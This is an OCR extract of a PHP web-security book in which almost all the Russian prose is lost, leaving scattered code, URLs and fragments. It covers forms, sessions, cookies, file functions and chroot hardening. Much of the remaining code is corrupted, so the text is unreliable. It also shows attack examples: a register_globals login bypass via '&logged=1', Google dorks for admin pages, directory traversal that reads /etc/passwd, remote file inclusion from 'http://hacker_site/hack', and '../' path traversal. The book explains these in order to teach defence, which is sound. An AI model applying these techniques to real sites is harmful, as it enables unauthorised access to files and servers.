$goods[2]= "";
, ,
, . . :
$goods[]= "";
, 1 , . . 10.
, ,
:
$goods[""]= "";
$goods["b"]= "";
$goodst"cr"]= "";
echo($goods["b"]);
, .
array():
$goods = array("", "",
"");
,
. , array (), .
, 0 2.
array ()
. :
$goods = array("ca" => "", "" => "", "cr" = "carrot")
70

:
"" => ""
,
, .
f oreach, :
foreach (array as [$key => ] $value)
;
$key ( ),
. $vaiue .
,
:
foreach($goods as $Ind => $Val)
{
print("<P> index: $Ind <BR>value: $Val");
}
,
count (), . count () , . :
echo(count($goods));
2.11.
,
, . . , , ,
, system.
.
,

, , .
71_
, php.ini
error_reporting E_ALL.
. ,
2.8, print_max(),
:
error_reporting(E_ALL);
, :
Warning: Use of undefined constant
/var/www/html/I/functionsl.php on line 25
sdf23
assumed
'sdf23'
in
error_reporting . E_ALL, TO . ,
:
error_reporting(E_ALL - (E_NOTTCE + E_WARNING));
,
php.ini.
.
,
.
, SQL Injection (
SQL-),
.
, , ,
@. , p r i n t ()
, @print (), .
2.12.
,
.
, , ,
Web- .
, ,
. ,
,
, .
72
2.12.1.
, , $HTTP_ENV_VARS. -. , Windows
set, Unix- env.
, :
, ;
$DOCUMENT_ROOT
$SCRIPT_FILENAME
$SERVER_ADDR
IP- , ;
, ;
$SERVER_PORT
$SERVER_NAME
$SERVER_PROTOCOL
$REMOTE_ADDR
IP- , ;
$REMOTE_PORT
HTTP-;
$REQUEST_METHOD (GET POST), 3 3 -
$REQUEST_URI URL- .
, : http://192.168.1.1/admin/index.php,
/admin/index.php;
$QUERY_STRING , ,
. (&), =;
$HTTP_HOST
,
;
. ,
$SERVER_NAME,
, -, , ,
;
$_
$HTTP_USER_AGENT
, .

],
.
$_SERVER[MMH
PHP
73
, :
<?php
print("<P>$DOCUMENT_ROOT");
print("<P>$SCRIPT_FILENAME");
print("<P>$HTTP_HOST");
2.12.2.
Web- . -
. HTML , . , :
<form action="param.php" method="get">
: <input name="UserName">
</form>
<form> :
Action
URL , ;
Method . get post. ,
,
.
<form> </form> ,
. ( <input>).
UserName.
, Web-
. param.php $userName. , ,
.
, , param.php, . , ,
.
2.14.
74
2.14.
<HTML>
<HEAD> </HEAD>
<BODY>
<orm action="param.php" method="get">
</form>
<?php
if ($UserName<>"")
{
print("<> : " ) ;
print("$UserName") ;
</BODY>
<HTML>
, $UserName
,
. <Enter>, , $userName . ,
: , , . .
. ,
- ,
. . , : userName
Password, , type (), hidden ():
<form action="param.php" method="get">
User Name:
<input name="UserName">
<input type="hidden" name="Password" value="qwerty">
</form>
PHP
75_
Password , . . param.php suserName

$password .
.
,
HTML-. , Internet Explorer
| HTML (View | Source). , , .
, (, action URL), .
, , , .
( php.ini)
, , , register_giobals.
,
,
.
, .
.
, : GET POST. , .
2.12.3. GET
GET. , , . ,
$HTTP_GET_VARS. , $_GET. .
URL-. , URL- : http://192.168.77.1/
param.php?UserName=Flenov&Password=qwerty.
, =. (&).
, ? !

.
, . ,
GET ,
.
76
.
.
, URL.
.
GET,
POST. , GET ,

, .
GET:
,
;
.
?

, - .
GET . ,
www.amazon.com
, .
, ? Amazon, GET, , : www.amazon.com?partner=flenov. amazon.com
, Partner . , . : ,
amazon.com.
, GET URL
. ,
, , .
GET? ,
google.com. , , ,
, . ,
, .
, , - . ? , PHP, Perl .
PHP
77_
, , . .
, phpbb ikonboard,
, .
-
, ,
, .
, .
, ? .
URL-. ,
www.sitename.ru , Invision Power Board, :
http://www.sitename.ru/index.php?showforum=4
index.php?showforum= , Invision Power Board. ,

URL , Google :
inurl:index.php?showforum
, . , - .
,
"Powered by Invision Power Board(U)". , , .
,
. :
Powered by Invision Power Board(U) inurl:index.php?showforum
150 , .
Invision Power Board,
. , .
"inurl:admin/index.php",
, . - .
, , , ,
.
3.3.1 , ,
. google.com , GET URL.
78_
, GET . ,
10 , . , URL
:
http://www.sitename.ru/index.php?showfonim=4
index.php, showforum 4. , , , 4.
-.
, POST. , ,
URL :
http://www.sitename.ru/index.php
, , URL. , GET
, , , ,
.
2.12.4. POST
POST GET. ,
, , $HTTP_GET_VARS ( POST ). GET, , POST :
<form action="param.php" method="post">
User Name:
</form>
.
POST
=. ,
$HTTP_POST_VARS. ,
$_POST.
URL, .
, -
PHP
79_
, 2.15. postparam.php.
| 2.15. POST
<form action="postparam.php" method="post">
User Name: <input name="UserName">
<input type="hidden" name="Password" value="qw.erty">
</form>
<?php
if ($UserName<>"")
{
print("<> : " ) ;
print("$UserName");
print("<>: $Password");
POST.
, :
http://192.168.77.l/postparam.php?UserName=Flenov&Password=qwerty
, GET, . ? , "", , . $HTTP_POST_VARS $HTTP_GET_VARS
, .
$HTTP_POST_VARS, TO GET , $HTTP_GET_VARS.
2.16 ,
, URL, . . GET. $HTTP_GET_VARS ,
.
!
"
'
| 2.16.
<form action="arrayparam.php" method="post">
80
</form>
<?php
i f (count($HTTP_GET_VARS)>0)
{
die(" ");
}
if ($HTTP_POST_VARS["UserName"]<>"")
{
print("<> : " ) ;
print($HTTP_POST_VARS["UserName"]);
print("<> : " ) ;
print($HTTP_POST_VARS["Password"]);
. <Enter>,
, , , Submit Go:
<form action="submitl.php" method="get">
cinput type="sutmit" name="sub" value="Go">
</form>
<?php
if ($sub="Go")
{
print("<P>Submitted
: $Submit");
, . , , , "Go".
POST URL,
, .
, ,
PHP
81
. POST , , URL,
. , 3.5.
2.12.5.
. php.ini register_giobals, .
. :
<form action="testpass.php" method="get">
: <input name="username">
: <input name="password">
</form>
if ($password== $legal_pass) and ($username==$legal_name)
$logged = 1
if ($logged)
{
//
}
. : $username $password. , $ logged 1.

$ logged: 1,
.
URL, :
http://192.168.77.l/testpass.php?username=admin&password=pass
, URL logged:
http://192.168.77. l/testpass.php?username=admin&password=pass&Iogged=l
, , ,
. ,
, , .
Slogged 1. , , ,
(&
,
Slogged ,
.
, ,
,
, ,
. , ,
, . Open Source, .
? :
1. register_giobals off
. Slogged
, .
2. ,
. ,
, .
.
,
:
<form action="testpass.php" method="get">
: <input name="username">
: <input name="password">
</form>
$logged=0;
if ($password== $legal_pass) and ($username==$legal_name)
Slogged = 1
if (Slogged)
{
//
}
Slogged,
0,
Slogged 1.
Web register_globals.
PHP
83_
, ,
.
2.12.6.
! ? , ,
. Web- ,
action, , , , .
, , , ,

. ,
-
cookie. , .
hidden:
<form action="param.php" method="post">
<input type="hidden" name="HiddenParam" value="00000">
</form>
, type hidden, . param.php,

, $HiddenParam, .
, , :
<form action="param.php?HiddenParam=00000" rnethod="post">
</form>
, . , cookie , , ,
cookie.
2.13.
HTTP .
(, , Flash- . .) . , -
84
, ,
.
,
.
, :
cookie , .
:
;
;
;
, .
"" , .
, .
. , , .
, ,
- . ,
.
, , .
:
, ,
. ,
- . . ,
;
. . ,
. ( ) -
, ,
.
PHP

, cookie.
2.13.1.
. , . .
s e s s i o n _ s t a r t ( ) . ,
true, false.
,
. session_register(), .
, , .
. session.php,
,
( 2.17).
I 2.17.
<?php
if (session_start())
{
print("OK");
}
$user=$UserName;
session_register ("user") ,-
<form action="session.php" method="get">

<input type="submit" name="sub" value="Go">
</form>
<a href="sessionl.php">This is a link</a>
, PHP- . .
, , - HTML-. ?
86
HTML-, ,
.
.
.
PHP- , ,
. $user, , ,
$UserName.
sessionl.php.
, . :
<?php
session_start();
print("<>: $user");
?>
,
.
$user.
session.php.
.
. , session l.php
. , sessionl.php
.
,
. ?
sessionl.php. . , , . ,
.
sessionl.php , .
, 2.18.
I 2.18.
|
<?php
session_start();
<HTML>
1
j
PHP
87
<HEAD>
<TITLE> Test page </TlTLE>
</HEAD>
<BODY>
<?php
if (!isset($user))
{
die(" ");
}
print("<P>Hello: $user");
<hr>
<center>
<p>Hackish PHP
<br>© Michael Flenov 2005
</centerxP>
</BODY>
<HTML>
, .
. , ,
i s s e t (). $user , false.
( ), , , die () .
, , php.ini register_giobals on. , ,
$_SESSION.
:
<?php
if
(session_start())
{
print("OK");
}
$_SESSION["user"] = $UserName;
88
.2
?>
<form action="session2.php"
method="get">

<input type="submit" name="sub" value="Go">
</form>
<a href="session3.php">This
is a link</a>
session2.php.
, session3.php :
<?php
if (!isset($_SESSION["user"]))
{
die("Authorization required");
}
$t = $_SESSION["user"] ;
print("<P>Hello: $t");
?>
PHP ,
?
SID (Session ID). cookie, session_start SID
.
, cookie - ,
- . ,
. , , ,
? , cookie.
SID , POST GET,
,
SID. ,
. , .
session.php .
URL-, :
http://192.168.77.1/l/session2.php?PHPSESSID=
8a22009f72339e71525288b33188703d&UserName=Tet
PHP
89_
URL PHPSESSID, SID.

URL . , ,
session2.php?<?=SID?>:
<form action="session2.php?<?=SID?>" method="get">
<input type="sutmit" name="sub" value="Go">
</form>
<?=SID?> , URL
SID.

cookie, , URL
. SID ,
. , SID . . ,
. .
URL-
.
, ,
. , , SID,
.
, , , ,
. , , (,
),
.
, cookie , ,
. , , .
cookie ,
, cookie , , . .
2.13.2. Cookie
2.13.1 ,
.
4 . 1315
90
PHP . cookie
, .
Cookie, , ,
. .
.
. , cookie
. ,
.
cookie.
, ,
cookie. . ,
www.hostname.com/myname.
/myname, cookie
. (/myname/), cookie , , www.hostname.com/myname/admin/.
.
, ,
/myname/index.php. , , cookie
.
, cookie.
,
cookie. ,
, www.hostname.com/.
(, wwwl.hostname.CDm
flenov.hostname.com, hostname.com, hostname.com cookie.
,
cookie.
, cookie HTTPS.
( ) HTTP . HTTP .
,
cookie. , setcookie (), :
int setcookie(
string cookiename
[, string value]
[, integer lifetime]
PHP
91_
I, string path]
[, string domain]
I, integer secure]
)
. ,
cookie, . :
value ;
lifetime ;
path ;
domain ;
secure . ,
1, HTTP .
, cookie . cookie
. - cookie, .
PHP-, cookie, HTML, :
Warning: Cannot add header information - headers already sent by (output started at
/var/www/html/l/cookie.php:8) in /var/www/html/1/cookie.php on line 11
: ( /var/www/html/l/cookie.php:8) /var/www/html/1/cookie.php
11.
,
cookie , HTML-
require include, HTML-,
- .
, , .
cookie ,
.
:
<?
$access++;
92
setcookie("access", $access);
?>
$access .
,
1. cookie.
HTML- :
<?php
print(" $access ");
?>
. . ? , , , cookie, . PHP-
, cookie,
.
, .
cookie , . ,
cookie.
:
,
time(), .
, . ,
10 .
setcookie time()+6oo.
, . 10
, cookie
;

mktime().
6 , cookie: , ,
, , , . ,
. ,
, .
cookie 00:00:00 1
2010 :
setcookie("access", $access, mktime(0,0,0,1,1,2010));
, .
PHP
93_
, ? , ,
cookie. , ?
, cookie :
,
;
, cookie
.
.
, cookie .
$HTTP_COOKIE_VARS. , $HTTP_COOKIE_VARS[ "access" ] $access. $HTTP_COOKIE_VARS
: $_COOKIE.
cookie
admin mydomain.com, . . URL http://mydomain.com/
admin :
setcookie("access", $access, mktime(0,0,0,1,1,2010),
"/admin", "mydomain.com");
cookie /admin/index.php:
setcookie("access", $access, mktime(0,0,0,1,1,2010),
"/admin/index.php", "mydomain.com");
cookie , ?
, :
<?php
$access[0]=$access[0]+1;
$access[l]=$access[1]+2;
setcookie("access", $access, mktime(0,0,0,1,1,2010));
?>
$access, . 1, 2. . , 9, . .
. , $access
. :
<?php
94
s e t c o o k i e ( " a c c e s s [ 0 ] " , $access[0],
setcookie("access[1]", $access[l],
mktime(0,0,0,1,1,2010));
mktime(0,0,0,1,1,2010));
?>
. cookie? .
, . , cookie .
, access:
setcookie("access");
,
access, .

, , . .
, $Test@Me,
setcookie () $Test_Me.
, , , , cookie
, .
, $Test@Me, : $HTTP_COOKIE_
VARS[ "$Test@Me"]. ( , , :
$HTTP_COOKIE_VARS["$Test_Me"] ).
2.13.3. cookie
cookie , .
,
. cookie:
Web-;
, HTML- JavaScript;
.
.
, ,
cookie.
cookie , .
PHP
95_
. , cookie ,
.
cookie. ,
.
cookie , , .
, , ,
.
2.14.
. -
. ,
. 3.4.1
, , ,
.
,
, . ,
.
PHP- , . ,
, .
Web-,
Web-.
root,
, , .
, Web-. Apache Linux
"Linux " [1].
.
1. .
2. .
3. .
,
. , /.
96
2.14.1.
f open (), :
int fopen(string filename, string mode [, int use_include_path])
, . :
filename , , .
mode . :
;
+ ;
w . ,
.
;
w+ . ,
. ;
.
;
+ . ;
.
Windows.
use_inciude_path ,
include_path php.ini.
, .
, Web- ,
, , .
false,
.
/. , .
if($f=fopen("testfile.txt", "w+"))
(
print(" ($f)");
else
{
die(" ");
PHP
__.
, , , HTTP FTP. ,
HTTP:
$f=fopen("http://www.you_domain/testfile.txt", "r")
FTP:
$f=fopen("http://ftp.you_domain/testfile.txt", "")
, . , . ,
, URL.
2.14.2.
, . , ,
, .
f c i o s e o , :
int
fclose (int
f)
.
, true, false. , :
i f ( ! ( $ f = f o p e n ( " t e s t f i l e . t x t " , "w+")))
{ print(" ");
//
fclose($f);
2.14.3.
:
freadf), fgetcf), fgets(), fgetss().
. .
fread (),
:
string fread(int f, int length)
:
, ;
.
_9S
.

, f read i)
.
:
if(!($f=fopen("/var/www/html/l/testfile.txt'\
{
d i e ( " F i l e open e r r o r " ) ;
"r")))
//
$s = fread($f, 7 ) ;
print("<P>Line 1: $s");
// 11
$s = fread($f, 11);
fClose($f);
, testfile.txt, "This is
a test". ,
. 7 f read .
8- , .
fgets (). fread():
string fgets(int f, int length)
? freado , . , :
This is a test
Test file
40 . , , . :
//
$s = fgets($f, 40);
//
$s = fgets($f, 40);
PHP
99_
fgets (). , ,
. , ,
40 ( ), fgetsO
.
, fread () , , , a f gets () .
f g e t s s o fgetsO, HTML- PHP-. :
string fgetss(int f, int length [, string allowable])
, .
, . ,
, , : <>, <i>, <u> . .
. f gets ,
f i l e (), :
array file(string filename [, int use_include_path])
, ,
, . .
, . , ,
10 . f i l e () . 100 ?
.
f i l e , .
, :
if
($arr=file("/var/www/htnil/l/testfile.txt"),
{
for
($i=0; $i<count($arr);
$i++)
printf ("<BR>%s", $arr[$i]),-
"r+")
100
, , fgetcO.
, !
, . :
string fgetcfint f)
, fgetcO .
, false.
, ,
.
,
.
fgetss (), .
, .
,
. ,
.
2.14.4.
, . : fpassthruO r e a d f i i e i ) .
, ,
. , ,
, .
:
if ($f=fopen("/var/www/html/1/testfile.txt", ""))
{ print("File opened ($f)"); }
else
{ die("File open error"); }
fpassthru($f);
fpassthruO
.
,
r e a d f i l e ( ) :
readfile("/var/www/htinl/1/testfile.txt");
f p a s s t h r u O
readfile().
, . ,
PHP
101_
index.php, HTML-
. , JavaScript-. .
2.14.5.
: fwritef)
fputs (). ,
fwrite ():
int
fwrite(int
f,
string ws [, int length])
, :
, ;
, ;
. ,
.
, true, false.
, . :
if(!($f=fopen("/var/www/html/1/testfile.txt",
"r+")))
{
die("File open error");
$s = fread($f, 7) ,print("<P>Line 1: $s");

fwrite($f, "writing");
fclose($f);
7 , .
8- , , 8- .
2.14.6.
,
, . ,
, -
102
.
feof (). true,
. , :
if(!($f=fopen("/var/www/html/1/testfile.txt", "")))
{
die("File open error"); }
while (!feof($f))
{
$str = fread($f, 10);
fclose($f);
10 ,
.
, .
1 100 ,
. , . fseek(),
:
int fseek(int f, int offset [, int whence])
, :
f ;
offset , .
, ;
whence . SEEK_SET. ,
:
SEEK_SET ;
SEEK_CUR ;
SEEK_END . ,
.
, 10 , :
fseek($f, SEEK_END, - 1 0 ) ;
$s = fread($f, 10);
f seek
10 . .
PHP
W3_
, f t e l l ( ) .
,
. :
$pos = ftell($f);
,
rewind (). , .
2.14.7.
,
PHP-, .
, , .
.
file_exists():
int
file_exists(string filename)
, , true, false.
, :
if(!(file_exists("/var/www/html/l/testfile.txt")))
{
die(" "); }
if(!($f=fopen("/var/www/html/l/testfile.txt",
{
"r")))
die(" "); }
, , (, )
filectime():
int filectime(string filename)
,
f i l e c t i m e o :
if ($time=filectime("testfile.txt"))
{
$timestr dateC'l d F Y h:i:s A", $time);
print("Last modified: $timestr");
}
,
.
104
, filectimeO, , date (). . ,

:
am ;
AM ;
G d ;
D , ;
F ;
h 12- ;
24- ;
i ;
j ;
1 ;
m ;
, ;
s ;
U ;
Y - ;
w (0 );
;
z .
fileatimeO .
.
, , ,
:
int fileatime(string filename)
filesizeo :
int filesize(string filename)
, .
,
, ,
. , ,
. , true false.
PHP
5_
is_dir() true, :
int is_dir(string filename)
is_executabie () true, :
int is_ executable (string filename)
i s _ f i i e ( ) true,
:
int is_file(string filename)
is_readable()
:
true,
int is_readable(string filename)
is_writabie() true,
:
int is_writable(string filename)
2.14.8.
, , .
. . . .
, , .
.
,
.

():
int copy(string source, string destination)
, .
. true. ,
testfile.txt , :
if (copy("testfile.txt", "/"))
{
print("Complete") ;
106
?.
rename ():
int rename(string oldname, string newname)
, .
. ,
. , :
if (rename("/home/flenov/testfile.txt",
"/home/flenov/templates/1.txt"))
{
print("Complete");
}
unlink :
int unlink (string filename)
.
Unix- ,
, . , ,
/home/flenov/php, .
,
/home/flenov/php.

.
, ,
.
, .
,
. ,
.
2.14.9.
. .
, .
.
getcwdO , :
string getcwdO
PHP
7_
chdir ():
int chdir(string dir)
, .
mkdir ():
int mkdir(string dirname, int mode)
. Unix-.
Windows .
, "Linux " [1].
, /var/www/html/2.
0700. . .
mkdir("/var/www/html/2", 0700);

. /var/www/html.
rmdiro
. :
int rmdir(string dirname)
. ,
.
2.14.10.
:
opendir () ;
readdirO ;
closedir () .
- .
, , . ,
.
.
, . . opendir ():
int opendir(string dir)
opendir () , .
.
108
r e a d d i r o ,
:
string readdir(int handle)
, false.
closedir (),
.
,
. , , ( 2.19).
I 2.19.
function ReadDirectory($dir, $offs)
if ($d=opendir($dir))
while ($file=readdir($d))
if (($file=='.') or ($file=='..'))
continue;
if (is_dir($dir."/".$file))
print("<BR>$offs <B>$dir/$file</B>");
ReadDirectory($dir."/".$file, $offs."-");
else
print("<BR> $offs $dir/$file") ;
closedir($d);
ReadDirectory ("/var/www/html/1", $offs="");

ReadDirectory , , , .
.
( ), . , , ReadDirectory ( ) ,
.
,
? . -
PHP
109_
, . ,
is_dir () , , true, . ?
/var/www/html, /var/www/html/ ,
, is_dir () true.

.
, , , .
2.20.
I 2.20.
!
'
function rmdir_with_files($dir, $offs)

{
if ($d=opendir($dir))
{
while ($file=readdir($d))
{
if (($file=='.') or ($ile=='..'))
continue;
if (is_dir($dir.'7".$file))
{
ReadDirectory($dir."/".$file, $offs."-");
rmdir($dir./.$file);
}
else
unlink($dir./.$file) ;
}
}
closedir($d);
}
rmdir_with_files ("/var/www/html/1", $offs="");
, .
rmdir_with_fiies() /,
. ,
.
,
: " .
, .
, ". , . , . , , ,
,
.
- ,
.
, ,
. ,
.
, .
, ,
.
. ,
. ,
, , god , fEd45k%92-EDh_GdPnS82Ndg.
3.1.
. ,
. ,
112
,
Web-.
,
, , ( , ).

. , ,

. .
,
.
.
, , . SSL,
.
,
,
.
, , ,
, .
,
.

,
, . Linux- "Linux " [1].
MySQL Apache Linux. ,
. , . MySQL :
1. ,
root . . , ,
, root.
Linux, , root. .
113
2. . .
3. , . (
MySQL) .
.
, ,
. MS SQL Server sa, ,
, MySQL
root . MySQL,
:
/usr/bin/mysqladmin -uroot password newpass
MySQL Apache enroot. ?

( Linux chroot), .
bin
usr
var
chroot
bin
| j
usr
] L
home
user2
I useri
home
var
useri
user2
. . 1 . chroot
, chroot,
. . 3.1.
Linux. /.
/bin, /usr, /var, /home . . /home
. , chroot,
. /bin, /usr
. ., , , /home/chroot, . , /home/chroot
.
114
. 3.1 , .
,
.
/etc, /home/chroot/etc,
/etc. ,
/home/chroot/etc ,
. , /etc/passwd , /home/chroot/etc/passwd,
.
, , /home/chroot/etc/passwd
. ,
/etc/passwd,
, /home/chroot/etc/passwd
.
Linux chroot,
, .
.
Jail.

http://www.jmcresearch.com/
projects/jail/.
( - software).
,
tar xzvf jail.tar.gz
jail
. , . .
jail/src (cd j a i i / s r c )
Makefile (, ). , .
:
ARCH= LINUX_
#ARCH= FREEBSD
#ARCH= IRIX
#ARCH=
SOLARIS
DEBUG = 0
INSTALL_DIR = /tmp/jail
PERL = /usr/bin/perl
ROOTUSER = root
ROOTGROUP = root
115
. Linux,
FreeBSD, Irix Solaris .
. , (
INSTALL_DIR). (
) /tmp/jail. He , , ,
. /usr/local,
. .

root,
, su root.
, preinstall.sh
. , :
chmod 755 preinstall.sh
. jail/src, :
make
make install
, /usr/local/bin
: addjailsw, addjailuser, jail mkjailenv.
/home/chroot. , .
:
mkdir /home/chroot

. :
/usr/local/bin/mkjailenv
/home/chroot
, /home/chroot.
dev etc. , dev .
/dev, : null, urandom zero.
etc : group, passwd shadow.
. ,
passwd, :
root:x:0:0:Flenov,Admin:/root:/bin/bash
bin:x:l:l:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
116
, , Linux. shadow . , , rw
( 600).
/home/chroot/etc/shadow
/etc/shadow.
. ,
, .
.
:
/usr/local/bin/addjailsw /home/chroot
.
, /home/chroot . , /home/chroot/bin cat, cp, Is, rm . ., , , /bin.
, , ,
. - , ,
, , .
, .
. :
/usr/local/bin/addjailsw /home/chroot -P httpd
htird
. jail , .
.
:
/usr/local/bin/addjailuser chroot home sh name
chroot ,
/home/chroot. home . sh . name ,
( ).
, robert ( ) :
/usr/local/bin/addjailuser /home/chroot \
/home/robert /bin/bash robert
117
,
\. ,
.
, Done,
.
httpd ( Linux Apache) apache.
. :
/usr/local/bin/addjailuser /home/chroot \
/var/www /bin/false apache
? :
chroot /home/chroot
. ,
. , , , .
, ,
:
Is -al
/etc
, , /etc. /etc/passwd;
.
,
/home/chroot. .
httpd :
/usr/sbin/httpd. , chroot
Web- , MySQL.
, ,
, - .
,
, Web.
3.2.
, .
/ ,
.
, .
118
3.2.1.
. , /etc. ,
, ,
.
Web- ( Apache), . ( ),

.
^
^ *
. , (inc, dat . )
, , JavaScript .

. , .
, . , JavaScript
, .
, , .
3.2.2.
, ,
, .
. .
. Web-, ,
, . .
Web- , ,
Web-, , .
.
119
,
, , - .
,
. . . ,
.
( SELECT), .

. ,
, ,
, . . ,
, . .
( ), .
, , , ,
. , . , . -
(, ),
.
, MS SQL Server, Oracle .,
. (
, SQL ), . ,
,
. , , , :
DELETE FROM TableName
, , ,
10, , . , , . , ,
, ,
120
. ,
, .

. , ,
.
10 .
. , .
,
.
,
. MySQL LOAD DATA LOCAL file.
.
/etc/my.cnf [mysqld]
:
Set-variable=local-infile=0
3.2.3.
, MySQL-. . -,
Web-, , . Web- , .
MySQL,
/etc/my.cnf [mysqld] skip-networking.
.
:
, . MySQL
3306.
IP-, ;
. ,
.
. , ,
. , ,
.
121
3.2.4.
,
.
.
.
Unix- , Linux,
.
Linux :
, ,
;

, ;
.
,
.
. .
.
- ,
, . , , - :
. Web-
/etc, ,
, , .
.
. ,
. .
, PHP-
. , , ,
, .
3.2.5.
.
,
. , .
5 3. 1315
122
MySQL , , . Web- . , 80- , .

. .
? URL,
.
:
URL
;
, . , , ;
, URL . . , , .

Apache. Web- htaccess .
, . ,
.
HTTPS,
.
, .
- ,
.
( 8 )
.
3.2.6.
10 ,
- . , .
"", -
123
. ,
, .
.
,
. ,
.
Google (www.google.com). , .
, , , .

Web-.
, . , ,
SSL.
Google ,
. ,
,
.
www.google.com , , - Google. . ,
:
filetype:doc
filetype:xls
Word Excel,
" ". , , , , . ,
, .
, Web, .
, , . , :
, , ,
(PDF, XLS, DOC . .).

, ,
124
. .
? , robots.txt,
.
, www.yourjname.com. ,
, www.your__name.com/robots.txt.
,
, .
:
user-Agent:
, .
, .
,
user-Agent (*);
Disallow: , URL. , URL www.yourname.com/admin,
/admin. ,
URL, , URL-.
robots.txt, , www.your_name.com/admin www.your_name.com/cgi_b'n
:
User-Agent: *
Disallow: /cgi-bin/
Disallow: /admin/
. ,
www.your_name.com/cgi_bin/forum .
:
User-Agent: *
Disallow: /
, . , .
,
, ,
. , , ,
,
.
125
3.3.
, , ,
, .
, . , ,
.
" " [2],
.
? , . ,
.
, .
, .
. .
. ,
, .
, , .
, , . ? .
, , ping,
. :
ping s i tename.com
. ,
IP- :
Pinging sitename.com [209.35.183.210] with 32 bytes of data:
, Whois.
,
, , http://www.internic.com/whois.html.
IP-
,
DNS-, . . Whols . 3.2.
126
3
Home - Flenov Internet Explorer
File
Edit
View
Back
Favorites
Tools
Help
.; liil -' / l s e a r * i-V Favorites i&Media )
Addea^ | i ^ ]
S3 Q
Go
http://reports.internic.net/cgi/whois?whois_n(Cniicrosoft.com&tYpedonia(n
Unlg
Whois Search Results

Search a g a i n (.aero, arpa, .biz, com. coop, .edu, .info, int, .museum,
name, .net, (
Domain
Registrar
0
(ex. internic.net)
(ex. ABC Registrar, Inc.)
Nameserver
(ex. ns.example.com or 192.16.0 192)
1 Submit I
Whois Server
Version
1.3
Domain names i n the .com and . domains can new be r e g i s t e r e d

with many d i f f e r e n t competing r e g i s t r a r s . Go t o h t t p : / / w w w . i n t e r n i c . n e t
for d e t a i l e d information.
Domain Name: HICROSOFT.COM
R e g i s t r a r : IUCOWS INC.
Whois Server:
whois.opensrs.net
Referral URL: http://domainhelp.tucow3.com
Name Server: NS3.MSFT.NET
Name Server
NS1.MSFT.NET
Name Server
N55.MSFT.NET
Name Server
NS2.MSFT.NET
Name Server
NS4.MSFT.NET
S t a t u s : REGISTRAR-LOCK
Updated Date: 23-jun-20CM
Creation Date: Q2-may-1991
Expiration Date: Q3-may-2014
Internet
. 3.2. Whois
Web-. , , . . ? , (
, , ), , , :
G , (
). , , , , , , phpBB (www.phpbb.com).
127
,
. , . , ; . ,
, .
.
, index.php,
. , index.bak index.old, . , ,
.
, ( ,
), , old
bak. ,
.
php, , . old , .

, , , .
,
.
, , .
. , , .
, , . 3.2.6 , , .
, , - .
robots.txt ,
? , .
, :
User-Agent: *
Disallow: /admin/
128
3_
Disallow: /include/
Disallow: /options/
/admin,
. /options
,
, , ,
.
,
.
, , -
.

,
SQL-. , .

. ,
, HTML-,
- .
:

. ,
, ;
GET
POST ;
, , , .
, .
"", ,
, , , , . .
, , .
-
, , , , , SQL-. , - ,
129
, . :
, systemO, exec ..
, ,
, Is Unix.
Web- ,
, .
, :
(deface), . ,
;
.
( Unix- rm),
;
, i n c l u d ed , r e a d f i i e d . .
,
, /etc/passwd,
/etc/shadow, Unix- . ,
, ;
SQL-,
,
, , .

, ,
.
, .
. Cross-Site Scripting , ,
3.11 3.12 .
3.4.
-
, , .
,
90%. ,
.
. ,
. .
130
, . . ,
100 , . :
;
;
;
,
.
1000
. , , .
, .
, , .
3.4.1.
( ), . , ,
URL-,
. , ,
.
sitenatne.domain.
, ,
,
.
, :
http://www.sitename.domain/index.php?dir=:KaTaaor&file=(paifcji
d i r , ,
f i l e . .
, -
/etc/passwd (, Unix- ).
: " ?" , .
, Unix-
.
, dir. , ,
/, . ,
, .
131
. :
http://www.sitename.domain/index.php?dir=/etc&file=.
Unix,
.
/etc. , - ,
, passwd, :
http://www.sitename.domain/index.php?dir==/etc&file=passwd
. ,
,
(. 3.3). FreeBSD. ,
, /etc/passwd,
, .
toor:*:0:Q:Bourne-again Supertisen/root:
daemon:*:l:J.:Owner of many system
processes;/root;/sbM"i/nologinoperator^*:2:5:System
&:/:/sbm/nologin bin:*:3;7:Binaries Commands and
Source:/;/sbin/nologin tty;*:4:65533:Tty
SanAox:/:/sWn/notagintaem:*:5:65533;KMem
Sandbox:/:/sbin/noIqoiD oames;":7:13;Games pseudousen/usr/games:/sbin/ri0tagin news:*:8;8:News
Subsystem:/;/sbtn/noJooifi man:"*:9;9:Mister Man
Pages:/usr/share/marr./sbtn/rio!Qgin sshd:*:22:22;S
Shell 0aeman;/var/empty:/sbtn/nologin
smmsp:*:25:25:Sendroati Submission
User:/v3r/spool/dientrn{|ueie:/sbin/notooin
mai(nulf;":26:26:Sendmaa Default
User:/vaf/spool/mqueue:/sbiiVnologarbtfid:!B;53;S3:Btnd
SarKJbox:/:/sbin/i>o!ogin uuej>:*:66:66:UUCP pseudopop:*:68:6:Post Office Owrter:/ronexistent:/sbin/noiog(n
www:*t80:80:World Wide Web
Owner:/f>one>dstent:/sbin/notogin
nobody: * :65534:65534;Unprivifeged
user:/nonexistent:/sbin/nologin test:*: 100i:0:User
&:est:/bin/csh mysqh"*:88:88:MySQL
DaemoniA'ar/db/mysciii/sbtfi/nologm
postfix:": 1002:1001:Postftx Matt
System:/var/spool/postfix:/sbin/nolootn al:*: 1003:0:User
8u'/horne/al:/bin/sh tsurerv:*:2000:1003:Hosting user
tsuren :/home/tsuren:/sbin/noIogin
PahaN:*: 1000:1003:Mosting user
PahaNi/homeâhaN/./www/altruistic.rur/sbin/rioIogin
pahan:*: 1004:1003:Hosting user
pahan:/home/pahan:/sbtn/nologin
my4a4oc:*:1005:1003;Hosting user
. 3.3. .

132
.
, . root, toor. Kc , , - , .
,
.
, [ :
http://www.sitename.domain/index.php?dir==/root&file=.
, . , Web , ,
.

, .
,
, ,
. , ,
.
, :
d i r . ,
. . , , /etc.
, ,
.
d i r file.
, .
, , parami param2. He ,
.
,
, .
.
, f i l e
, .
, .
- , , fdfgdg, . URL ,
. .
133
, . :
http://www.sitename.domain/index.php?dir=/etc&file=passwd
, a i r
f i l e fdfgdg. d i r
, : /etc/passwd.fdfgdg.
, , .
,
. ,
, news.php.
, . ,
, :
news.php, , http://hacker_site/hack.news.php;
:
http://www.sitename.domain/index.php?file=http://hacker_site/hack
http://hacker_site/
hack.news.php, include
require(). .
,
. /,
. ,
. ,
/var/www/html/inc dat. :
"/var/www/html/inc/$ file.dat"
, $f i l e
. . ,
-
hackfile, , /tmp. , dat (hackfile.dat)
$f i l e ../../../../../tmp/hackfile.
, , " . . / " .
, ?
, , -
134
. , .
,
, , GET. ,
, , , .
, . , , . ,
.
(. . ), , .
3.4.2.
,
